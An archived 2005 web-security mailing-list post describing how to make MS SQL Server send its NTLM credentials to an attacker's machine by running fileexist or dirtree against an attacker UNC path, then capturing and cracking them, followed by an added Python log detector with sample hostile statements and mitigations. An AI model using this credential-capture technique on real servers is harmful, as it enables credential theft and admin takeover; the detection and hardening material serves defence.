[WEB SECURITY] RE: Blind SQL Injection / Stored procedures
Argeniss
lists at argeniss.com
Thu Nov 17 13:23:01 EST 2005
I would like to mention a trick for MS SQL Server (this is a Windows
weakness, so it can be exploited on other applications as well) that is not
well known and could be really dangerous. It has some limitations, e.g. if
SQL Server is behind a firewall blocking connections, etc.
-By default Windows sends NTLM credentials when authenticating to network
shares.
-Run Cain tool on your computer
-Start sniffer.
-On victim server
EXECUTE master.dbo.fileexist '\\yourIP\anything'
or
EXECUTE master.dbo.dirtree '\\yourIP\anything'
-Check on Cain SMB captured passwords
-Send it to cracker.
-Crack it.
If SQL Server is not running under the system account and the password is
weak, then it can be cracked and used to get admin access to SQL Server.
Enjoy.
Cesar.
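The post describes SQL Server being tricked into authenticating to an attacker-controlled UNC path. From the defender's side, the most useful thing to have is a detector for exactly that pattern in statement logs: calls to the path-taking extended procedures named in the post (xp_dirtree / xp_fileexist, in either spelling the post uses) whose argument is a UNC path to a host that is not an approved file server. The following is an added example written for this page, not code from the original post or from Argeniss; the pipe-delimited log format (timestamp|login|statement text) and the sample lines are constructed assumptions, and the host allow list is a hypothetical parameter.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Sequence

# Extended stored procedures from the post that follow a UNC path when executed.
# Both the xp_-prefixed and the unprefixed spellings are accepted, as in the post.
PATH_PROCS = r"(?:xp_)?(?:fileexist|dirtree)"

# Matches e.g.  EXEC master.dbo.xp_dirtree '\\192.0.2.10\anything'
# and           exec master..xp_fileexist '\\fileserver01\backups\full.bak'
# capturing the procedure name and the UNC host.
UNC_CALL = re.compile(
    r"\bEXEC(?:UTE)?\s+"
    r"(?:master\s*\.\s*(?:dbo)?\s*\.\s*)?"
    r"(?P<proc>" + PATH_PROCS + r")\s*"
    r"'\\\\(?P<host>[^\\']+)(?:\\[^']*)?'",
    re.IGNORECASE,
)

@dataclass
class Finding:
    timestamp: str
    login: str
    proc: str
    host: str
    reason: str  # "unknown host" or "allow-listed host"

def parse_line(line: str) -> Optional[Sequence[str]]:
    """Split one constructed log line into (timestamp, login, statement text)."""
    parts = line.rstrip("\n").split("|", 2)
    if len(parts) != 3:
        return None
    return parts

def is_allowed(host: str, allowed_hosts: Sequence[str]) -> bool:
    """Case-insensitive membership test against the hypothetical allow list."""
    return host.lower() in {h.lower() for h in allowed_hosts}

def scan(lines: Iterable[str], allowed_hosts: Sequence[str] = ()) -> List[Finding]:
    """Return one Finding per UNC-path call to a path-taking extended procedure."""
    findings: List[Finding] = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, login, text = parsed
        for m in UNC_CALL.finditer(text):
            host = m.group("host")
            reason = "allow-listed host" if is_allowed(host, allowed_hosts) else "unknown host"
            findings.append(Finding(ts, login, m.group("proc"), host, reason))
    return findings

def high_severity(findings: Iterable[Finding]) -> List[Finding]:
    """Keep only calls that point at hosts outside the allow list: the case the post describes."""
    return [f for f in findings if f.reason == "unknown host"]

# Constructed sample log lines (not real data). Line 3 targets an approved file server.
SAMPLE_LOG = """\
2005-11-17T13:20:01|webapp|SELECT name FROM products WHERE id = 42
2005-11-17T13:20:02|webapp|EXECUTE master.dbo.xp_dirtree '\\\\192.0.2.10\\anything'
2005-11-17T13:20:03|sa|exec master..xp_fileexist '\\\\fileserver01\\backups\\full.bak'
2005-11-17T13:20:04|webapp|EXECUTE master.dbo.fileexist '\\\\203.0.113.7\\x'
"""

if __name__ == "__main__":
    for f in high_severity(scan(SAMPLE_LOG.splitlines(), allowed_hosts=("fileserver01",))):
        print(f"{f.timestamp} login={f.login} proc={f.proc} host={f.host} ({f.reason})")
```

In practice the statement text would come from a SQL Server Audit or an Extended Events batch-completed session rather than a pipe-delimited file, but the matching logic is the same. Any hit from an application login is worth an alert on its own, since a web application has no business calling these procedures at all; combined with the limitations the post already names, the durable fixes are to block outbound SMB from database hosts at the firewall, to run SQL Server under a dedicated low-privilege service account with a strong password, and to revoke EXECUTE on these extended procedures from logins that do not need them.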
---------------------------------------------------------------------
The Web Security Mailing List
http://www.webappsec.org/lists/websecurity/
The Web Security Mailing List Archives
http://www.webappsec.org/lists/websecurity/archive/